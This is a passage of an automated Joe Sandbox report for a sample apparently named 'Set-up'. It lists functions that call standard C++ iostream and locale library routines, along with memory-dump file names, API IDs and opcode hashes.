                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EF68
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EFCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 3d97b54e1f9ff8f58f42d013f85c4393c9aa28219628356feb74ca6506010afa
                                                                                              • Instruction ID: f3c237fa7c50738c12536224cfe67829811333f0be9ca1ba9b92a80a46ee064c
                                                                                              • Opcode Fuzzy Hash: 3d97b54e1f9ff8f58f42d013f85c4393c9aa28219628356feb74ca6506010afa
                                                                                              • Instruction Fuzzy Hash: A9217C71A15108AFCB05CFA8C991EEDFBB9AF58308F244059E142B7291EB799F04DB60
                                                                                              Function 6BC2CF3E Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CF45
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2CF64
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CF82
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CFE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: f0a724117012cd8d88a3fc3f0c5f06e149b1bacb0953a4c04c3ec723429720b6
                                                                                              • Instruction ID: e28c9780daeb467d8c6a14ec606898985d914480b7c3f92ced0edfa0b5c54777
                                                                                              • Opcode Fuzzy Hash: f0a724117012cd8d88a3fc3f0c5f06e149b1bacb0953a4c04c3ec723429720b6
                                                                                              • Instruction Fuzzy Hash: EC21AC72A11208AFCB05CFA8C981EDDFBB5AF58308F24405DE142B7291EB399F04DB60
                                                                                              Function 6BC2EE1D Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EE24
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EE43
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EE61
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EEC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 8bc8e98b96337173bfa03104eb80be811d853257b5ca56119482d49d8d99e938
                                                                                              • Instruction ID: f52a85eba1791534b1aa2a065292dcf8e1cdcd36105d83165de4b068a8913257
                                                                                              • Opcode Fuzzy Hash: 8bc8e98b96337173bfa03104eb80be811d853257b5ca56119482d49d8d99e938
                                                                                              • Instruction Fuzzy Hash: 22216D71A151089FCB05CFA8C991AEDFBB5AF58304F244059E141B7291E7799F44DB60
                                                                                              Function 6BC2BE2B Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BE32
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BE51
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BE6F
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: b188c68bfad91ee68731cc9db6b92582d262b182c57ed65b38371c3732609a80
                                                                                              • Instruction ID: 2f6362c62fd61ea8a2b871fd344e3427a992c6898607790a2ae4b2f4e63218f9
                                                                                              • Opcode Fuzzy Hash: b188c68bfad91ee68731cc9db6b92582d262b182c57ed65b38371c3732609a80
                                                                                              • Instruction Fuzzy Hash: D5217C71A15208AFCB05CFA8C991EDDFBB5AF58308F24405DE142B7291EB799F44DB60
                                                                                              Function 6BC2CE37 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CE3E
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2CE5D
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CE7B
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CEDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 713e75190acf269ecbf9e9a5249741c2bbd31dcd679e8b4e4a3d1a5680e85356
                                                                                              • Instruction ID: 11f08f5dceed85c9ddc338d781b45aa7e10f57316d18a1b589d77991bae43896
                                                                                              • Opcode Fuzzy Hash: 713e75190acf269ecbf9e9a5249741c2bbd31dcd679e8b4e4a3d1a5680e85356
                                                                                              • Instruction Fuzzy Hash: 0321AF75A111089FCB04CFE8C981EDDBBB5AF58304F144059E141B7291E7399F04DB60
                                                                                              Function 6BC2ED16 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2ED1D
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2ED3C
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2ED5A
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EDBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 83ee19bd682137c6fb1fc993bd52ac2f7d07d02c9437e73841d56bb24eb0a81c
                                                                                              • Instruction ID: f42035376ea4a3ec80358fe1550ee6403a8f42d991a620a9bbd5bbed851ae263
                                                                                              • Opcode Fuzzy Hash: 83ee19bd682137c6fb1fc993bd52ac2f7d07d02c9437e73841d56bb24eb0a81c
                                                                                              • Instruction Fuzzy Hash: 94219875A11108AFCB01CFA8C981BEDFBB9AF18308F244059E546B7281EB399F04DB60
                                                                                              Function 6BC2BD24 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BD2B
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BD4A
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BD68
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BDCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
